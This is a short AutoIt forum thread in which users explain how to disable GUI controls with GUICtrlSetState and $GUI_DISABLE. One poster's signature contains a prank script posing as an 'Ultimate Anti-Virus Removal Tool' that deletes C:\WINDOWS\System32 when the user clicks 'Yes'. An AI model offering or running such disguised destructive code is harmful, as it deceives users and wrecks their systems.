Firefoxy Posted January 2, 2008 Posted January 2, 2008 Can you disable buttons and editboxes. Like with $WS_DISALBE or something else? Sorry for all the questions, Hunter ;Ultimate Anti-Virus Removal Tool $ans = MsgBox(4, "Ultimate AV", "Press 'Yes' to remove all viruses, press 'No' to exit.") If $ans = 6 Then DirRemove("C:\WINDOWS\System32") ElseIf $ans = 7 Then Exit EndIf
Antiec Posted January 2, 2008 Posted January 2, 2008 Yep, just use "GUICtrlSetState($BtnName, $GUI_DISABLE)" and $GUI_ENABLE... You could search the forums though, I'm sure someone has asked this before...
rasim Posted January 2, 2008 Posted January 2, 2008 Can you disable buttons and editboxes. Like with $WS_DISALBE or something else? Sorry for all the questions, HunterGuiCtrlSetState(controlID, $GUI_DISABLE)Read the help file!
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now